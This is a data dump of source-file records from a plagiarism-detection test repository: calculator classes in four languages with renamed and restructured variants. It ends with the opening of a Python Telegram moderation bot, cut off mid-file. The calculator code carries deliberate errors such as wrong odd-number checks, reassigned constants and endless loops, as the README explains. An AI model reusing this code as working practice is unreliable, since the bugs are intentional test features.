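The calculator variants in this repo exist as plagiarism test material: same structure, renamed identifiers, shared quirks. A quick way to quantify how close two variants are (a sketch, not part of the repo) is difflib's similarity ratio:

```python
# Illustration only -- not the repo's code. Compares two variant files
# character-by-character; paths assume the repo's directory layout.
import difflib

def similarity(path_a, path_b):
    with open(path_a) as a, open(path_b) as b:
        return difflib.SequenceMatcher(None, a.read(), b.read()).ratio()

# Renamed identifiers barely lower the score:
print(similarity("python/Calculator.1.py", "python/Calculator.2.py"))
```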
{
"alpha_fraction": 0.558962881565094,
"alphanum_fraction": 0.5609573721885681,
"avg_line_length": 37.57692337036133,
"blob_id": "533377f5286c177116212b2991ee540bf6ca7ecc",
"content_id": "489b452cf7909baee936c3a8fd9310acc6706a61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4011,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 104,
"path": "/c++/Calculator.4.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // History of results\nprivate: vector<float> history;\n\n // Constructor for loading results from file\n public: Calculator(string fileName) {\n loadHistoryFromFile(fileName);\n print(\"Calculator was created\");\n }\n \n Calculator() {\n print(\"Calculator was created\");\n }\n\n // Prints text with current date\n public: void print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds two numbers\n public: float addition(float number1, float number2) {\n float result = number1 + number2;\n print(\"Result od addition is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Divides two numbers\n public: float division(float number1, float number2) {\n float result = number1 / number2;\n print(\"Result od division is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Adds result to history array\n private: void addToHistory(float item) {\n history.push_back(item);\n }\n\n // Adds results to history\n public: void loadHistoryFromFile(string fileName) {\n try {\n std::ifstream file(fileName);\n string readLine = \"\";\n while (getline(file, readLine)) {\n addToHistory(stof(readLine));\n }\n file.close();\n print(\"History form file was loaded!\");\n } catch (const std::exception& e) {\n print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n\n public: void something(){\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n std::vector<std::string> myStrings { \"prepended to\" , \"my string\" } ;\n std::string prepended = std::accumulate( 
myStrings.begin( ) , \n\t myStrings.end( ) , std::string( \"\" ) , []( std::string a , \n\t std::string b ) { return a + b ; } ) ;\n std::cout << prepended << std::endl ;\n }\n};"
},
{
"alpha_fraction": 0.7657266855239868,
"alphanum_fraction": 0.7819956541061401,
"avg_line_length": 37.41666793823242,
"blob_id": "3de3ea80f52bf27b7dd1af3ea38e69064c336c33",
"content_id": "2ad2d578e3b05fb2ba0f6d790c3ff923d4307793",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 24,
"path": "/README.md",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "# plagiarism-source-code-examples\nSource code examples of plagiarism for my diploma thesis\n\n5 Most used programming languages on Github (according to [this list](https://www.businessinsider.com/the-10-most-popular-programming-languages-according-to-github-2018-10#7-typescript-4))\n- Javascript\n- Java\n- Python\n- PHP\n- C++\n\nIn variants:\n- Classic\n- .1. Different names\n- .2. Different naming systems\n- .3. Restructured\n- .4. Half-different (http://www.rosettacode.org/wiki/String_prepend, php: http://www.rosettacode.org/wiki/String_concatenation#PHP)\n\nEvery language has a different file, which solves different problem: http://www.rosettacode.org/wiki/Forest_fire\n\n**Description**\n\nSimple calculator class representing basic elements of source code. These examples are not the best way how to create such class!\n\nThey should mimic plagiarism accross different languages: same function, same structure, same errors, etc.\n"
},
{
"alpha_fraction": 0.6075441241264343,
"alphanum_fraction": 0.6203852295875549,
"avg_line_length": 23.441177368164062,
"blob_id": "b250ec45abcdeaa13e28fc841130f2253756860b",
"content_id": "c1ef9d95d47ecb0b3b69f1d26745b9dcfdfd671d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2492,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 102,
"path": "/javascript/Calculator.2.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Calculator class\n\nclass Calculator {\n\t// m_history of results\n m_history = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(file_name) {\n\t\tthis.load_history_from_file(file_name);\n\t\tthis.f_print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tf_print(text) {\n\t\tdate = new Date();\n\t console.log(\"# \" + date.toString() + \" # \" + text );\n\t}\n\t\n\t// Adds two numbers\n\tf_addition(number_1, number_2) {\n\t\tconst l_result = number_1 + number_2;\n\t\tthis.f_print(\"Result od f_addition is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Subtracts two numbers\n\tf_substraction(number_1, number_2) {\n\t\tconst l_result = number_1 - number_2;\n\t\tthis.f_print(\"Result od f_substraction is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tf_multiplication(number_1, number_2) {\n\t\tconst l_result = number_1 * number_2;\n\t\tthis.f_print(\"Result od f_multiplication is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Divides two numbers\n\tf_division(number_1, number_2) {\n\t\tconst l_result = number_1 / number_2;\n\t\tthis.f_print(\"Result od f_division is \" + l_result);\n\t\tthis.add_to_history(l_result);\n\t\treturn l_result;\n\t}\n\t\n\t// Adds l_result to m_history array\n\tadd_to_history(l_item) {\n\t\tthis.m_history.append(l_item);\n\t}\n\t\n\t// f_print the whole m_history\n\tprint_history() {\n\t\tthis.m_history.forEach(function(l_result){\n\t\t\tthis.f_print(l_result);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcompare_numbers(number_1, number_2) {\n\t\tif (number_1 > number_2) {\n\t\t\tthis.f_print(number_1 + \" is bigger than \" + number_2);\n\t\t} else if (number_2 > number_1) {\n\t\t\tthis.f_print(number_1 + \" is smaller than \" + number_2);\n\t\t} else {\n\t\t\tthis.f_print(number_1 + \" is the same as \" + number_2);\n\t\t}\n\t}\n\t\n\t// Adds results to m_history\n\tload_history_from_file(file_name) {\n\t\ttry {\n\t\t\tfile_name = file_name.split('\\n');\n\t\t\tconst read_line = 0;\n while (read_line < file_name.length) {\n\t\t\t\tthis.add_to_history(file_name[read_line]);\n\t\t\t\tread_line += 1;\n }\n this.f_print(\"m_history from file was loaded!\");\n\t\t} catch (e) {\n\t\t\tthis.f_print(\"File could not be loaded! Because:\" + e);\n\t\t}\n\t}\n\t\n\t// Returns if l_number is odd\n\tis_odd(l_number) {\n\t\tbool_is_odd = (l_number%2) != 0;\n\t\tswitch (bool_is_odd) {\n\t\t\tcase true:\n\t\t\t\tthis.f_print(l_number + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.f_print(l_number + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5159597992897034,
"alphanum_fraction": 0.527328372001648,
"avg_line_length": 23.869565963745117,
"blob_id": "f9a6c912911b900fc9c5668de100e8d559167ef4",
"content_id": "c2587cd8b71a43b6af561ad4e20cea0c56fa1489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2287,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 92,
"path": "/php/Calculator.4.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// History of $results\n\tprivate $history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($fileName = '') {\n\t\t$this->loadHistoryFromFile($fileName);\n\t\t$this->print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function addition($number1, $number2) {\n\t\t$result = $number1 + $number2;\n\t\t$this->print(\"Result od addition is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function division( $number1, $number2) {\n\t\t$result = $number1 / $number2;\n\t\t$this->print(\"Result od division is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to history array\n\tprivate function addToHistory($item) {\n array_push($this->history, $item);\n\t}\n\t\t\n\t// Adds $results to history\n\tpublic function loadHistoryFromFile($fileName) {\n if($fileName !== '')\n try {\n\t\t\t$file = fopen($fileName, \"r\");\n $readLine = \"\";\n while (($readLine = fgets($file)) !== false) {\n $this->addToHistory($readLine);\n }\n fclose($file);\n $this->print(\"History form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\n\tpublic function voidsomething() {\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\t$s = \"hello\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t\techo $s . \" literal\" . \"\\n\";\n\t\t$s1 = $s . \" literal\";\n\t\techo $s1 . \"\\n\";\n\t}\n}"
},
{
"alpha_fraction": 0.6211317181587219,
"alphanum_fraction": 0.6352785229682922,
"avg_line_length": 21.1862735748291,
"blob_id": "705085e32bf12ace3d711c8a81908c878d2b4439",
"content_id": "f03e8163e29602702aeb6526982b4f55cca5b1c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2262,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 102,
"path": "/javascript/Calculator.1.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Computer class\n\nclass Computer {\n\t// records of results\n records = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(path) {\n\t\tthis.pushResultsData(path);\n\t\tthis.log(\"Computer was created\");\n\t}\n\t\n\t// Prints content with current time\n\tlog(content) {\n\t\ttime = new time();\n\t console.log(\"# \" + time.toString() + \" # \" + content );\n\t}\n\t\n\t// Adds two numbers\n\tplus(numeral1, numeral2) {\n\t\tconst outcome = numeral1 + numeral2;\n\t\tthis.log(\"outcome od plus is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Subtracts two numbers\n\tminus(numeral1, numeral2) {\n\t\tconst outcome = numeral1 - numeral2;\n\t\tthis.log(\"outcome od minus is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tmultiply(numeral1, numeral2) {\n\t\tconst outcome = numeral1 * numeral2;\n\t\tthis.log(\"outcome od multiply is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Divides two numbers\n\tdivide(numeral1, numeral2) {\n\t\tconst outcome = numeral1 / numeral2;\n\t\tthis.log(\"outcome od divide is \" + outcome);\n\t\tthis.pushResult(outcome);\n\t\treturn outcome;\n\t}\n\t\n\t// Adds outcome to records array\n\tpushResult(element) {\n\t\tthis.records.append(element);\n\t}\n\t\n\t// log the whole records\n\tlogResults() {\n\t\tthis.records.forEach(function(outcome){\n\t\t\tthis.log(outcome);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcomparisonNumerals(numeral1, numeral2) {\n\t\tif (numeral1 > numeral2) {\n\t\t\tthis.log(numeral1 + \" is bigger than \" + numeral2);\n\t\t} else if (numeral2 > numeral1) {\n\t\t\tthis.log(numeral1 + \" is smaller than \" + numeral2);\n\t\t} else {\n\t\t\tthis.log(numeral1 + \" is the same as \" + numeral2);\n\t\t}\n\t}\n\t\n\t// Adds results to records\n\tpushResultsData(path) {\n\t\ttry {\n\t\t\tdata = path.split('\\n');\n\t\t\tconst row = 0;\n while (row < data.length) {\n\t\t\t\tthis.pushResult(data[row]);\n\t\t\t\trow += 1;\n }\n this.log(\"records from file was loaded!\");\n\t\t} catch (error) {\n\t\t\tthis.log(\"File could not be loaded! Because:\" + error);\n\t\t}\n\t}\n\t\n\t// Returns if numeral is odd\n\tuneven(numeral) {\n\t\tbooleanUneven = (numeral%2) != 0;\n\t\tswitch (booleanUneven) {\n\t\t\tcase true:\n\t\t\t\tthis.log(numeral + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.log(numeral + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5910652875900269,
"alphanum_fraction": 0.6025200486183167,
"avg_line_length": 24.6862735748291,
"blob_id": "ab439b2113d2749ed620e2b0f73552770bcaea2e",
"content_id": "3b56dfc46c2b0a0802b399d805e7aa8e0f1d74a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2619,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 102,
"path": "/php/Calculator.1.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Computer {\n\t// records of $results\n\tprivate $records = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($path = '') {\n\t\t$this->pushResultsData($path);\n\t\t$this->log(\"Computer was created\");\n\t}\n\t\n\t// Prints content with current time\n\tpublic function log($content) {\n\t\t$time = time('m/d/Y h:i:s a', time());\n\t echo \"# \" . $time . \" # \" . $content;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function plus($numeral1, $numeral2) {\n\t\t$outcome = $numeral1 + $numeral2;\n\t\t$this->log(\"outcome od plus is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function minus( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 - $numeral2;\n\t\t$this->log(\"outcome od minus is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function multiply( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 * $numeral2;\n\t\t$this->log(\"outcome od multiply is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function divide( $numeral1, $numeral2) {\n\t\t$outcome = $numeral1 / $numeral2;\n\t\t$this->log(\"outcome od divide is \" . $outcome);\n\t\t$this->pushResult($outcome);\n\t\treturn $outcome;\n\t}\n\t\n\t// Adds $outcome to records array\n\tprivate function pushResult($element) {\n array_push($this->records, $element);\n\t}\n\t\n\t// log the whole records\n\tpublic function logResults() {\n\t\tforeach ( $this->records as $outcome) {\n\t\t\t$this->log($outcome);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function comparisonNumerals( $numeral1, $numeral2) {\n\t\tif ($numeral1 > $numeral2) {\n\t\t\t$this->log($numeral1 . \" is bigger than \" . $numeral2);\n\t\t} else if ($numeral2 > $numeral1) {\n\t\t\t$this->log($numeral1 . \" is smaller than \" . $numeral2);\n\t\t} else {\n\t\t\t$this->log($numeral1 . \" is the same as \" . $numeral2);\n\t\t}\n\t}\n\t\n\t// Adds $results to records\n\tpublic function pushResultsData($path) {\n if($path !== '')\n try {\n\t\t\t$data = fopen($path, \"r\");\n $row = \"\";\n while (($row = fgets($data)) !== false) {\n $this->pushResult($row);\n }\n fclose($data);\n $this->log(\"records form file was loaded!\");\n\t\t} catch (Exception $error) {\n\t\t\t$this->log(\"File could not be loaded! Because:\" . $error);\n\t\t}\n\t}\n\t\n\t// Returns if numeral is odd\n\tpublic function uneven( $numeral) {\n\t\t$booleanUneven = ($numeral/2) != 0;\n\t\tswitch ($booleanUneven) {\n\t\t\tcase true:\n\t\t\t\t$this->log($numeral . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->log($numeral . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5635820627212524,
"alphanum_fraction": 0.5725373029708862,
"avg_line_length": 28.65486717224121,
"blob_id": "6587b681382b3416c30842edb7901b9c199622e0",
"content_id": "1ba361e4bfa4c8c7f6e7996c633bb336dfb68ce5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3350,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 113,
"path": "/c++/Calculator.3.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // History of results\nprivate: vector<float> history;\n\n // Constructor for loading results from file\n public: Calculator(string fileName) {\n loadHistoryFromFile(fileName);\n print(\"Calculator was created\");\n }\n \n Calculator() {\n print(\"Calculator was created\");\n }\n\n // Returns if number is odd\n public: bool isOdd(float number) {\n bool boolIsOdd = (number/2) != 0;\n switch (boolIsOdd) {\n case true:\n print(to_string(number) + \" is odd!\");\n return true;\n case false:\n print(to_string(number) + \" is not odd!\");\n return false;\n }\n }\n\n // Adds two numbers\n public: float addition(float number1, float number2) {\n float result = number1 + number2;\n print(\"Result od addition is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Compare two numbers\n public: void compareNumbers(float number1, float number2) {\n if (number1 > number2) {\n print(to_string(number1) + \" is bigger than \" + to_string(number2));\n } else if (number2 > number1) {\n print(to_string(number1) + \" is smaller than \" + to_string(number2));\n } else {\n print(to_string(number1) + \" is the same as \" + to_string(number2));\n }\n }\n\n // Subtracts two numbers\n public: float substraction(float number1, float number2) {\n float result = number1 - number2;\n print(\"Result od substraction is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Print the whole history\n public: void printHistory() {\n for (float result: history) {\n print(to_string(result));\n }\n }\n\n // Multiplies two numbers\n public: float multiplication(float number1, float number2) {\n float result = number1 * number2;\n print(\"Result od multiplication is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Adds result to history array\n private: void addToHistory(float item) {\n history.push_back(item);\n }\n\n // Divides two numbers\n public: float division(float number1, float number2) {\n float result = number1 / number2;\n print(\"Result od division is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Prints text with current date\n public: void print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds results to history\n public: void loadHistoryFromFile(string fileName) {\n try {\n std::ifstream file(fileName);\n string readLine = \"\";\n while (getline(file, readLine)) {\n addToHistory(stof(readLine));\n }\n file.close();\n print(\"History form file was loaded!\");\n } catch (const std::exception& e) {\n print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n};"
},
{
"alpha_fraction": 0.5806210041046143,
"alphanum_fraction": 0.591844379901886,
"avg_line_length": 30.809524536132812,
"blob_id": "7be46df9380328eee8a4d714cfae8b05bf531028",
"content_id": "d784009466c9445f3d8ac11dd67cf9825939713d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2673,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 84,
"path": "/python/Calculator.3.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # History of results\n history = []\n\n # Constructor for loading results from file\n def __init__(self, fileName):\n self.loadHistoryFromFile(fileName)\n self.print(\"Calculator was created\")\n\n # Returns if number is odd\n def isOdd(self, number):\n boolIsOdd = number / 2 != 0\n if boolIsOdd:\n self.print(str(number) + \" is odd!\")\n return True\n if not boolIsOdd:\n self.print(str(number) + \" is not odd!\")\n return False\n\n # Add two numbers\n def addition(self, number1, number2):\n result = number1 + number2\n self.print('Result of addition is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Print the whole history\n def printHistory(self):\n for result in self.history:\n self.print(str(result))\n\n # Substracts two numbers\n def substraction(self, number1, number2):\n result = number1 - number2\n self.print('Result of substraction is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Compare two numbers\n def compareNumbers(self, number1, number2):\n if number1 > number2:\n self.print(str(number1) + \" is bigger than \" + str(number2))\n elif number2 > number1:\n self.print(str(number1) + \" is smaller than \" + str(number2))\n else:\n self.print(str(number1) + \" is the same as \" + str(number2))\n\n # Multiplies two numbers\n def multiplication(self, number1, number2):\n result = number1 * number2\n self.print('Result of multiplication is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Adds result to history array\n def addToHistory(self, item):\n self.history.append(item)\n \n # Divides two numbers\n def division(self, number1, number2):\n result = number1 / number2\n self.print('Result of division is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Prints text with current date\n def print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Adds results to history\n def loadHistoryFromFile(self, fileName):\n try:\n file = open(fileName)\n readLine = file.readline()\n while readLine != None:\n self.addToHistory(readLine)\n readLine = file.readline()\n file.close()\n self.print(\"History from file was loaded!\")\n except Exception:\n self.print(\"File could not be loaded! Because:\" + str(Exception))\n\n"
},
{
"alpha_fraction": 0.46807441115379333,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 25.53333282470703,
"blob_id": "67d11f4688eabb4debdafbaf826d8f5622f49dc1",
"content_id": "efd2b63c0d3116747f9af1ce6f8dece697877978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1989,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 75,
"path": "/python/Calculator.4.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # History of results\n history = []\n\n # Constructor for loading results from file\n def __init__(self, fileName):\n self.loadHistoryFromFile(fileName)\n self.print(\"Calculator was created\")\n\n # Prints text with current date\n def print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Add two numbers\n def addition(self, number1, number2):\n result = number1 + number2\n self.print('Result of addition is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Divides two numbers\n def division(self, number1, number2):\n result = number1 / number2\n self.print('Result of division is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Adds result to history array\n def addToHistory(self, item):\n self.history.append(item)\n\n # Adds results to history\n def loadHistoryFromFile(self, fileName):\n try:\n file = open(fileName)\n readLine = file.readline()\n while readLine != None:\n self.addToHistory(readLine)\n readLine = file.readline()\n file.close()\n self.print(\"History from file was loaded!\")\n except Exception:\n self.print(\"File could not be loaded! Because:\" + str(Exception))\n\n def something(self):\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s\n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)"
}
] | 16 |
cpasoft/Raspython-Bot | https://github.com/cpasoft/Raspython-Bot | 08e0ac7ae5f3d98d38aa6ef1d7f7230c42347216 | de76e5593bcfcc37889116b426ada756bd4a9b97 | bf7d32000a911192d4b69ff3fdcd64be86de2f33 | refs/heads/master | 2021-01-21T15:03:46.982117 | 2017-07-05T17:45:02 | 2017-07-05T17:45:02 | 95,373,400 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6050986051559448,
"alphanum_fraction": 0.6089329719543457,
"avg_line_length": 44.9507942199707,
"blob_id": "6679410f4977f2446f2b130ca7c247ade1a78653",
"content_id": "298ff620d20c325865f2a956fc4bb5a2b1ee46c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29312,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 630,
"path": "/RaspythonBot.py",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# RaspythonBot (c) 2017 - Raspython Group\n#\n# Bot de moderación creado por y para el grupo de Telegram @Raspython\n# t.me/raspython\n#\n#\n\n##########################################################################\n##########################################################################\n\n\n# Librería PTB\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram import MessageEntity, ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext.dispatcher import run_async\n\n# Librería para el log\nimport logging\n\n# Librerías del sistema\nimport os\n\n# Librería regex para filtrar textos\nimport re\n\n# Librería números enteros aleatorios\nfrom random import randint\n\n# Librería de tiempo, para pausas y demás\nfrom time import sleep\nimport datetime\n\n# Librería json\nimport json\n\n# Librería para el wrapping de librerías (decoración)\nfrom functools import wraps\n\n# Importamos las constantes desde el fichero correspondiente\n# Las importamos una a una por claridad y para saber cuales añadimos nuevas\nfrom constantes import TOKEN, LOG_FILE, GROUPS_ID, HASHTAG_FILE, ADMINS, START, END, HASHTAG, ANTIFLOOD, ANTIFLOOD_FILE\nfrom constantes import ANTIFLOOD_MINUTES, ANTIFLOOD_TAG, ANTIFLOOD_TAG_FILE\nfrom constantes import MSG_FLOOD, MSG_AFLOOD_FILE, AFLOOD_MSGS, AFLOOD_TIME, AFLOOD_MINUTES_DEL\n\n# Variables globales:\n# Semáforo para ficheros. Usado para controlar la grabación de ficheros en modo asíncrono\nsemaforo = {\n HASHTAG: False,\n ANTIFLOOD: False,\n ANTIFLOOD_TAG: False,\n MSG_FLOOD: False\n}\n\n# Inicializamos el subsistema de log para nuestro bot. Todos los errores y las informaciones irán a este fichero.\nlogging.basicConfig(filename=LOG_FILE, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# Control del semáforo para grabación de ficheros\ndef switch_semaforo(estado, fichero):\n global semaforo\n # Intento de inicio de grabación\n if estado == START:\n # Esperamos a tener el semáforo libre para pillar hueco\n while semaforo[fichero]:\n # Esperamos un tiempo aleatorio de 0 a 10\n sleep(randint(1, 100) / 100)\n # Cuando lo conseguimos, pillamos\n semaforo[fichero] = True\n # Si queremos cerrar el semáforo...\n else:\n semaforo[fichero] = False\n\n\n# Decorador para comprobar si un usuario está autorizado a usar una función (Comandos Admin)\ndef authorized(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n # Sólo funcionará si se envía desde privado. 
